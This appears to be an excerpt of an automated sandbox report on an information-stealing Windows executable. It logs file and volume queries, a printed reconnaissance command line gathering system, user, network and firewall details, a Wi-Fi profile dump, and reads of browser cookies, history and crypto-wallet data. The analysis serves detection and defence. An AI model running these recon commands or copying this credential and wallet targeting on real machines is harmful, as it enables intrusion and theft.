                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL\EEGWXUHVUG.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\EEGWXUHVUG.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\SUAVTZKNFL.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\SUAVTZKNFL.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\SUAVTZKNFL.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\SUAVTZKNFL.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL\SUAVTZKNFL.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\SUAVTZKNFL.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Pictures\Saved Pictures VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Documents\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Documents\BNAGMGSPLO.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Documents VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_ssl.pyd VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_ssl.pyd VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_ssl.pyd VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_ssl.pyd VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\multidict VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\multidict VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\multidict VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_ssl.pyd VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_ssl.pyd VolumeInformation
                      Source: C:\Windows\System32\net1.exe
                      Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exe
                      Code function: 0_2_00007FF677EBC7F0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF677EBC7F0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe
                      Code function: 58_2_00007FF81EC81B90 PyExc_RuntimeError,PyErr_SetString,Py_GetVersion,PyOS_snprintf,PyTuple_New,PyOS_snprintf,PyErr_WarnEx,PyBytes_FromStringAndSize,PyUnicode_FromStringAndSize,PyModule_GetDict,PyImport_AddModule,PyImport_AddModule,PyObject_SetAttrString,PyUnicode_InternFromString,PyUnicode_Decode,PyUnicode_FromStringAndSize,PyBytes_FromStringAndSize,PyObject_Hash,PyObject_SetAttr,PyImport_GetModuleDict,PyDict_GetItemString,PyDict_SetItemString,PyObject_GetAttr,PyExc_NameError,PyErr_Format,PyTuple_Pack,PyImport_ImportModule,_Py_Dealloc,PyImport_ImportModule,_Py_Dealloc,PyImport_ImportModule,_Py_Dealloc,PyCMethod_New,PyDict_SetItem,_Py_Dealloc,PyDict_New,PyDict_SetItem,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,PyErr_Occurred,PyExc_ImportError,PyErr_SetString,58_2_00007FF81EC81B90
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                      Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                      Source: C:\Windows\System32\cmd.exe
                      Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

                      Stealing of Sensitive Information

                      Source: Yara match File source: Process Memory Space: RuntimeusererVers.exe PID: 7988, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: RuntimeusererVers.exe PID: 8168, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: RuntimeusererVers.exe PID: 2956, type: MEMORYSTR
                      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, type: DROPPED
                      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, type: DROPPED
                      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, type: DROPPED
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File created: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Cookies.txt
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File created: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\network_info.txt
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File created: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\system_info.txt
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File created: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Firefox\History.txt
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File created: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\process_info.txt
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: aElectrum
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: aJaxx
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: aExodus
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: aEthereum
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: akeystore
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dtbqpus9.default
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\crashes\events
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
